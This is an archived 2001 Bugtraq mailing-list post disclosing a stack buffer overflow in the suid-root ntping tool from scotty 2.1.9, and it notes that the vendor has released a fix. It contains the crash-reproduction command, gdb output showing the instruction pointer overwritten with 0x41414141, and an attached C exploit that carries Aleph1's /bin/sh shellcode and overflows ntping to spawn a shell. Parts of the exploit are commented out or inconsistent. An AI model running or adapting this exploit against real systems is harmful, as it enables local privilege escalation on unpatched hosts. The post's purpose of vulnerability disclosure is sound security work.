linux, säkerhet

6655738 2001-06-21 10:55 -0400  /91 rader/ Larry W. Cashdollar <lwc@Vapid.dhs.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-22  02:45  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17547>
Ärende: suid scotty (ntping) overflow (fwd)
------------------------------------------------------------

This has circulated on vuln-dev not sure if it made it here yet.
Vendor  has been notified and released a fixed version 2.1.11.

My exploit:
http://vapid.dhs.org/ntping_exp.c

There is a much better exploit out there, but I am not sure if I have
permission to distribute it.  So I will leave that to the author.


Credit: KF <dotslash@snosoft.com>


---------- Forwarded message ----------
Date: Tue, 12 Jun 2001 05:34:16 -0400
From: KF <dotslash@snosoft.com>
To: vuln-dev@securityfocus.com
Subject: suid scotty (ntping) overflow

I am not sure that this made it on to the list the first time I sent
it... so sorry 
if this is a duplicate

[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)

Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/

What led me to research this:
arndt@aorta.tat.physik.uni-tuebingen.de (Michael Arndt) wrote:
>   i run scotty-testsuite: what must i change on my system:(Linux
>   slackware):
>   ==== Test generated error:
>   can not connect straps socket: Permission denied
straps and ntping must be installed suid root.

^------- Hrmm I sure thought that was interesting to know *grin*

Vendors affected:
unknown by the author of this document

just a note I found however...

<19990702221232.79B119410@Galois.suse.de>
Hi folks,
here is the long promised posting of all suid/sgid files on a alpha of
SuSE
Linux 6.2 ... comments on wrong permissions are welcome.
Please note that SuSE has got 5 full CD-Roms so thats the reason for the
many many files ... (and too much suid/sgid ones ...)
...
-rwsr-xr-x   1 root     root        33370 Jun 30 11:11 ./usr/bin/ntping
-rwsr-xr-x   1 root     root        18352 Jun 30 11:11 ./usr/bin/straps
...

[root@linux d0tslash]# gdb /usr/bin/ntping core GNU gdb 5.0mdk-11mdk
Linux-Mandrake 8.0 This GDB was configured as
"i386-mandrake-linux"...  (no debugging symbols found)...  Core was
generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.

Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libnsl.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libresolv.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libc.so.6...(no debugging symbols
found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0  0x40079b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0  0x40079b66 in getenv () from /lib/libc.so.6
#1  0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6
#2  0x4013b9de in __res_ninit () from /lib/libc.so.6
#3  0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6
#4  0x4013ff5f in gethostbyname () from /lib/libc.so.6
#5  0x080495b8 in _start ()
#6  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

-KF
(6655738) /Larry W. Cashdollar <lwc@Vapid.dhs.org>/(Ombruten)
Bilaga (text/plain) i text 6655739
6655739 2001-06-21 10:55 -0400  /51 rader/ Larry W. Cashdollar <lwc@Vapid.dhs.org>
Bilagans filnamn: "ntping_exp.c"
Importerad: 2001-06-22  02:45  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17548>
Bilaga (text/plain) till text 6655738
Ärende: Bilaga (ntping_exp.c) till: suid scotty (ntping) overflow (fwd)
------------------------------------------------------------
/*Larry W. Cashdollar                6/13/2001
  http://vapid.dhs.org               Vapid Labs
  Overflows ntping for scotty-2.1.9 based on post by
  dotslash@snosoft.com*/

#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90		/*no operation skip to next instruction. */
#define LEN 590			/*our buffersize. */

/*lacks a call to setuid(0)*/
char shellcode[]= /*Aleph1's shell code. */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{
  __asm__ ("mov %esp, %eax");
}

int
main (int argc, char *argv[])
{
  char buffer[LEN];
  int i;

  long retaddr = get_sp ();

/*Fill the buffer with our new address to jump to esp + offset */
  for (i = 0; i < LEN; i += 4)
    *(long *) &buffer[i] = retaddr + atoi (argv[1]);

/*copy the NOPs  in to the buffer leaving space for shellcode and
pointers*/

  printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]),LEN);
/*
  for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
    *(buffer + i) = NOP;*/

/*copy the shell code into the buffer*/
  memcpy (buffer + i, shellcode, strlen (shellcode));

  execl ("/usr/sbin/ntping", "ntping", buffer,0, 0);

}
(6655739) /Larry W. Cashdollar <lwc@Vapid.dhs.org>/-